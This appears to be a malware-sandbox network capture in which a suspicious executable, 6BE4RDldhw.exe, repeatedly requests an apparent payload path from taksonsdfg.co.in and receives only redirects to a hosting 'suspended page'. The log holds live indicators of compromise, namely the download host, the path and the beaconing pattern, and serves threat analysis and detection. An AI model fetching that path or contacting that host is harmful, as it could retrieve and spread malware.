Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49760	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:30 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:31 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:30 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:31 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:31 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49767	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:32 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:33 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:33 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:33 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49773	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:34 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:35 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:35 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:35 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:35 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49780	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:37 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:37 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:37 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:37 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49786	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:39 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:39 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:39 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:39 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:39 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49793	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:41 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:41 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:41 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:41 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49799	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:43 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:43 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:43 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:43 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:43 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49806	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:45 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:46 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:46 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:46 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49812	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:47 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:48 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:48 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:48 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:48 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49819	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:50 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:50 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:50 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
